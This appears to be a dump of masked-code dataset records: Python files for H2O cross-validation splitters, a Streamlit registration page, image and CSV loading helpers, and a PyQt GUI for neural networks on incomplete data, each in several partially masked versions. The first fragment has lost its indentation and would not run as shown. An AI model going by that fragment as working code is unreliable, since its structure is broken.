"""Default shuffle splitter used for ``h2o_train_test_split``.
This shuffle split class will not perform any stratification, and
will simply shuffle indices and split into the number of specified
sub-frames.
"""
def _iter_indices(self, frame, y=None):
"""Iterate the indices.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify. Since this class does
not perform stratification, ``y`` is unused.
Returns
-------
ind_train : np.ndarray, shape=(n_samples,)
The train indices
ind_test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples, self.test_size, self.train_size)
rng = check_random_state(self.random_state)
for i in range(self.n_splits):
permutation = rng.permutation(n_samples)
ind_test = permutation[:n_test]
ind_train = permutation[n_test:(n_test + n_train)]
yield ind_train, ind_test
class H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):
"""Shuffle splitter used for ``h2o_train_test_split`` when stratified
option is specified. This shuffle split class will perform stratification.
"""
def _iter_indices(self, frame, y):
"""Iterate the indices with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
Returns
-------
train : np.ndarray, shape=(n_samples,)
The train indices
test : np.ndarray, shape=(n_samples,)
The test indices
"""
n_samples = frame.shape[0]
n_train, n_test = _validate_shuffle_split(n_samples,
self.test_size, self.train_size)
# need to validate y...
y = _val_y(y)
target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist())
classes, y_indices = np.unique(target, return_inverse=True)
n_classes = classes.shape[0]
class_counts = bincount(y_indices)
if np.min(class_counts) < 2:
raise ValueError('The least populated class in y has only 1 '
'member, which is too few. The minimum number of labels '
'for any class cannot be less than 2.')
if n_train < n_classes:
raise ValueError('The train_size=%d should be greater than or '
'equal to the number of classes=%d' % (n_train, n_classes))
if n_test < n_classes:
raise ValueError('The test_size=%d should be greater than or '
'equal to the number of classes=%d' % (n_test, n_classes))
rng = check_random_state(self.random_state)
p_i = class_counts / float(n_samples)
n_i = np.round(n_train * p_i).astype(int)
t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int))
for _ in range(self.n_splits):
train = []
test = []
for i, class_i in enumerate(classes):
permutation = rng.permutation(class_counts[i])
perm_indices_class_i = np.where((target == class_i))[0][permutation]
train.extend(perm_indices_class_i[:n_i[i]])
test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])
# Might end up here with less samples in train and test than we asked
# for, due to rounding errors.
if len(train) + len(test) < n_train + n_test:
missing_indices = np.where(bincount(train + test, minlength=len(target)) == 0)[0]
missing_indices = rng.permutation(missing_indices)
n_missing_train = n_train - len(train)
n_missing_test = n_test - len(test)
if n_missing_train > 0:
train.extend(missing_indices[:n_missing_train])
if n_missing_test > 0:
test.extend(missing_indices[-n_missing_test:])
train = rng.permutation(train)
test = rng.permutation(test)
yield train, test
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedShuffleSplit, self).split(frame, y)
class _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):
"""Base class for KFold and Stratified KFold.
Parameters
----------
n_folds : int
The number of splits
shuffle : bool
Whether to shuffle indices
random_state : int or RandomState
The random state for the split
"""
@abstractmethod
def __init__(self, n_folds, shuffle, random_state):
if not isinstance(n_folds, numbers.Integral):
raise ValueError('n_folds must be of Integral type. '
'%s of type %s was passed' % (n_folds, type(n_folds)))
n_folds = int(n_folds)
if n_folds <= 1:
raise ValueError('k-fold cross-validation requires at least one '
'train/test split by setting n_folds=2 or more')
if shuffle not in [True, False]:
raise TypeError('shuffle must be True or False. Got %s (type=%s)'
% (str(shuffle), type(shuffle)))
self.n_folds = n_folds
self.shuffle = shuffle
self.random_state = random_state
@overrides(H2OBaseCrossValidator)
def split(self, frame, y=None):
"""Split the frame.
Parameters
----------
frame : H2OFrame
The frame to split
y : string, optional (default=None)
The column to stratify.
"""
frame = check_frame(frame, copy=False)
n_obs = frame.shape[0]
if self.n_folds > n_obs:
raise ValueError('Cannot have n_folds greater than n_obs')
for train, test in super(_H2OBaseKFold, self).split(frame, y):
yield train, test
@overrides(H2OBaseCrossValidator)
def get_n_splits(self):
"""Get the number of splits or folds.
Returns
-------
n_folds : int
The number of folds
"""
return self.n_folds
class H2OKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OKFold, self).__init__(n_folds, shuffle, random_state)
@overrides(_H2OBaseKFold)
def _iter_test_indices(self, frame, y=None):
n_obs = frame.shape[0]
indices = np.arange(n_obs)
if self.shuffle:
check_random_state(self.random_state).shuffle(indices)
n_folds = self.n_folds
fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=np.int)
fold_sizes[:n_obs % n_folds] += 1
current = 0
for fold_size in fold_sizes:
start, stop = current, current + fold_size
yield indices[start:stop]
current = stop
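# A quick check of the fold-size arithmetic used above (illustrative):
# 10 rows over 3 folds -> base size 10 // 3 == 3, remainder 10 % 3 == 1,
# so the realized fold sizes come out as [4, 3, 3].
def _fold_sizes(n_obs, n_folds):
    sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=int)
    sizes[:n_obs % n_folds] += 1
    return sizes  # _fold_sizes(10, 3) -> array([4, 3, 3])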
class H2OStratifiedKFold(_H2OBaseKFold):
"""K-folds cross-validator for an H2OFrame with
stratified splits.
Parameters
----------
n_folds : int, optional (default=3)
The number of splits
shuffle : bool, optional (default=False)
Whether to shuffle indices
random_state : int or RandomState, optional (default=None)
The random state for the split
"""
def __init__(self, n_folds=3, shuffle=False, random_state=None):
super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state)
def split(self, frame, y):
"""Split the frame with stratification.
Parameters
----------
frame : H2OFrame
The frame to split
y : string
The column to stratify.
"""
return super(H2OStratifiedKFold, self).split(frame, y)
def _iter_test_masks(self, frame, y):
test_folds = self._make_test_folds(frame, y)
for i in range(self.n_folds):
yield test_folds == i
def _make_test_folds(self, frame, y):
if self.shuffle:
rng = check_random_state(self.random_state)
else:
rng = self.random_state
# validate that it's a string
y = _val_y(y) # gets a string back or None
if y is None:
raise ValueError('H2OStratifiedKFold requires a target name (got None)')
target = frame[y].as_data_frame(use_pandas=True)[y].values
n_samples = target.shape[0]
unique_y, y_inversed = np.unique(target, return_inverse=True)
y_counts = bincount(y_inversed)
min_labels = np.min(y_counts)
if np.all(self.n_folds > y_counts):
raise ValueError(('All the n_labels for individual classes'
' are less than %d folds.'
                              % self.n_folds))
if self.n_folds > min_labels:
warnings.warn(('The least populated class in y has only %d'
' members, which is too few. The minimum'
' number of labels for any class cannot'
' be less than n_folds=%d.'
% (min_labels, self.n_folds)), Warning)
# NOTE FROM SKLEARN:
# pre-assign each sample to a test fold index using individual KFold
# splitting strategies for each class so as to respect the balance of
# classes
# NOTE: Passing the data corresponding to ith class say X[y==class_i]
# will break when the data is not 100% stratifiable for all classes.
        # So we pass np.zeros(max(c, n_folds)) as data to the KFold.
        # Remember, however, that we might be using the old-style KFold, which doesn't
# have a split method...
if SK18:
per_cls_cvs = [
KFold(self.n_folds, # using sklearn's KFold here
shuffle=self.shuffle,
random_state=rng).split(np.zeros(max(count, self.n_folds)))
for count in y_counts
]
else:
per_cls_cvs = [
KFold(max(count, self.n_folds), # using sklearn's KFold here
self.n_folds,
shuffle=self.shuffle,
random_state=rng)
for count in y_counts
]
test_folds = np.zeros(n_samples, dtype=np.int)
for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):
for cls, (_, test_split) in zip(unique_y, per_cls_splits):
cls_test_folds = test_folds[target == cls]
# the test split can be too big because we used
# KFold(...).split(X[:max(c, n_folds)]) when data is not 100%
# stratifiable for all the classes
# (we use a warning instead of raising an exception)
# If this is the case, let's trim it:
test_split = test_split[test_split < len(cls_test_folds)]
cls_test_folds[test_split] = test_fold_indices
test_folds[target == cls] = cls_test_folds
return test_folds
| [
33,
35,
36,
43,
47
] |
7 | 41cfd558824b6561114a48a694b1e6e6a7cb8c05 | <mask token>
| <mask token>
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
email = remail_input_container.text_input('Email ')
password = rpw_input_container.text_input('Password ', type='password')
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun()
| import streamlit as st
from streamlit.components.v1 import components
from streamlit.report_thread import get_report_ctx
from util.session import *
from multipage import MultiPage
from pages import register
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
email = remail_input_container.text_input('Email ')
password = rpw_input_container.text_input('Password ', type='password')
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun()
| import streamlit as st
from streamlit.components.v1 import components
from streamlit.report_thread import get_report_ctx
from util.session import *
from multipage import MultiPage
from pages import register
def app(page):
if not login_status():
title_container = st.empty()
remail_input_container = st.empty()
rpw_input_container = st.empty()
rregister_button_container = st.empty()
# title_container.write("Register")
email = remail_input_container.text_input("Email ")
password = rpw_input_container.text_input("Password ", type="password")
rregister_button = rregister_button_container.button('Register')
if rregister_button:
title_container.empty()
remail_input_container.empty()
rpw_input_container.empty()
rregister_button_container.empty()
login()
page.app()
st.experimental_rerun() | null | [
0,
1,
2,
3
] |
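The Streamlit record above imports `login_status()` and `login()` from `util.session`, which is not part of this dump. A minimal hypothetical stand-in backed by `st.session_state` might look like the sketch below; the real module may differ, and this assumes a Streamlit version that ships `st.session_state`:

import streamlit as st

def login_status() -> bool:
    # True once this browser session has authenticated
    return st.session_state.get('logged_in', False)

def login() -> None:
    # mark the current session as authenticated
    st.session_state['logged_in'] = True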
8 | f2bb44600f011a205c71985ad94c18f7e058634f | <mask token>
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
<mask token>
| <mask token>
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
<mask token>
| <mask token>
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[
int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,
List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
    class_to_index: List[Dict[str, int]] = [{} for _ in class_cols]
    index_to_class: List[Dict[int, str]] = [{} for _ in class_cols]
next_indices = [0] * len(class_cols)
with open(path, 'r', newline='', encoding='utf8') as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
return (metadata, len_metadata, headers, class_to_index, index_to_class,
num_classes)
| import os
import requests
from PIL import Image
from io import BytesIO
import csv
from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection
def get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],
Image.Image]:
def _apply(filepath: str, url: str) ->Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB')
return _apply
def from_url(url: str) ->Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) ->Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[
int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,
List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
    class_to_index: List[Dict[str, int]] = [{} for _ in class_cols]
    index_to_class: List[Dict[int, str]] = [{} for _ in class_cols]
next_indices = [0] * len(class_cols)
with open(path, 'r', newline='', encoding='utf8') as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
return (metadata, len_metadata, headers, class_to_index, index_to_class,
num_classes)
| import os
import requests
from PIL import Image
from io import BytesIO
import csv
from typing import Iterable, List, Tuple, Dict, Callable, Union, Collection
# pull the image from the api endpoint and save it if we don't have it, else load it from disk
def get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]:
def _apply(filepath: str, url: str) -> Image.Image:
img = from_file(filepath)
if img is None:
img = from_url(url)
img.save(filepath, img_format)
return img.convert('RGB') # convert to rgb if not already (eg if grayscale)
return _apply
def from_url(url: str) -> Image.Image:
api_response = requests.get(url).content
response_bytes = BytesIO(api_response)
return Image.open(response_bytes)
def from_file(path: str) -> Union[Image.Image, None]:
if os.path.exists(path):
return Image.open(path)
else:
return None
def load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\
-> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]:
metadata = []
    # one independent dict for each class col ([{}] * n would alias a single dict)
    class_to_index: List[Dict[str, int]] = [{} for _ in class_cols]
    index_to_class: List[Dict[int, str]] = [{} for _ in class_cols]
next_indices = [0] * len(class_cols) # next index for a new class value
with open(path, 'r', newline='', encoding="utf8") as metadata_file:
reader = csv.reader(metadata_file, **reader_args)
headers = next(reader)
for row in reader:
if len(row) != 0:
metadatum = [row[c] for c in cols]
# for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already
for c, class_col in enumerate(class_cols):
if not row[class_col] in class_to_index[c]:
class_to_index[c][row[class_col]] = next_indices[c]
index_to_class[c][next_indices[c]] = row[class_col]
next_indices[c] += 1
if valid_only and '' in metadatum:
continue
metadata.append(metadatum)
len_metadata = len(metadata)
num_classes = 0 if len(next_indices) == 0 else next_indices[-1]
# split off the headers
return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes
| [
2,
3,
4,
5,
6
] |
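A short usage sketch for the image and metadata helpers in the record above; the CSV name, column layout, and delimiter are assumptions, not part of the source:

# columns: 0 = cached file path, 1 = source URL, 2 = class label
metadata, n_rows, headers, cls_to_idx, idx_to_cls, n_classes = load_metadata(
    'metadata.csv', cols=(0, 1, 2), class_cols=(2,), delimiter=',')

fetch = get_img_from_file_or_url(img_format='JPEG')
for filepath, url, label in metadata:
    img = fetch(filepath, url)  # downloaded once, then served from disk thereafter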
9 | 302605d8bb45b1529742bf9441d476f0276085b9 | <mask token>
class MyMainWindow(QMainWindow):
<mask token>
def initUI(self):
self.statusBar().showMessage('Ready')
dataModule = QVBoxLayout()
        self.dataFileChooseButton = QPushButton('Choose Data')
        self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
        self.dataLossSimulateSettingButton = QPushButton('Set Missing-Data Parameters')
        self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
        self.dataShowButton = QPushButton('Show Data')
        self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
        self.showResultButton = QPushButton('Show Classification Results')
        self.showResultButton.setFont(QFont('微软雅黑', 16))
        self.judgeResultButton = QPushButton('Evaluate Classification Results')
        self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
        self.dataFileChooseButtonT = QPushButton('Choose Data')
        self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
        self.dataLossSimulateSettingButtonT = QPushButton('Set Missing-Data Parameters')
        self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
        self.dataPreProcessButtonT = QPushButton('Preprocess Data')
        self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
        self.dataShowButtonT = QPushButton('Show Data')
        self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
        self.showResultButtonT = QPushButton('Show Classification Results')
        self.showResultButtonT.setFont(QFont('微软雅黑', 16))
        self.judgeResultButtonT = QPushButton('Evaluate Classification Results')
        self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
        self.setWindowTitle('Neural Network System for Datasets with Missing Values')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
                    'Data file does not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
                    'Data file does not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
                'combine-CNN: Set Missing-Data Parameters', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
                'traditional NN: Set Missing-Data Parameters', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
            self.showDataW = showDataWidget.ShowDataWidget('combine-CNN Data View',
                self, 'New')
        elif self.sender() is self.dataShowButtonT:
            self.showDataW = showDataWidget.ShowDataWidget('traditional NN Data View',
                self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
            reply = QMessageBox.information(self, 'Data Error', 'No data loaded; cannot preprocess',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
                'Preprocessing succeeded!', QMessageBox.Yes, QMessageBox.Yes)
return
<mask token>
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
            reply = QMessageBox.information(self, 'Data Error', 'No data loaded; cannot train',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1
] < self.combineNumConv:
                reply = QMessageBox.information(self, 'Parameter Error',
                    'Convolution combination (kernel) size exceeds the number of dataset features', QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].
DataTrainX.shape[1], self.combineNumConv
) < self.combineNumPooling:
                reply = QMessageBox.information(self, 'Parameter Error',
                    'Pooling combination (kernel) size exceeds the dimension of the convolution-layer output feature vector', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
                reply = QMessageBox.information(self, 'Notice',
                    'Traditional NN training is in progress; please wait for it to finish', QMessageBox.Yes,
QMessageBox.Yes)
return
            self.trainingW = TrainingWidget.trainningWidget('combine-CNN Training',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
                reply = QMessageBox.information(self, 'Notice',
                    'combine-CNN training is in progress; please wait for it to finish', QMessageBox.Yes,
QMessageBox.Yes)
return
            self.trainingWT = TrainingWidget.trainningWidget('traditional NN Training',
                self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
                reply = QMessageBox.information(self, 'Model Error', 'Model does not exist',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
                        reply = QMessageBox.information(self, 'Save Result',
                            'Model saved successfully', QMessageBox.Yes, QMessageBox.Yes)
else:
                        reply = QMessageBox.information(self, 'Save Result',
                            'Model save failed', QMessageBox.Yes, QMessageBox.Yes)
else:
                reply = QMessageBox.information(self, 'Save Result', 'Model save failed',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
                reply = QMessageBox.information(self, 'Model Error', 'Model does not exist',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
                        reply = QMessageBox.information(self, 'Save Result',
                            'Model saved successfully', QMessageBox.Yes, QMessageBox.Yes)
else:
                        reply = QMessageBox.information(self, 'Save Result',
                            'Model save failed', QMessageBox.Yes, QMessageBox.Yes)
else:
                reply = QMessageBox.information(self, 'Save Result', 'Model save failed',
QMessageBox.Yes, QMessageBox.Yes)
<mask token>
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
                reply = QMessageBox.information(self, 'Notice', 'Training is in progress',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
                'combine-CNN Prediction Results', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
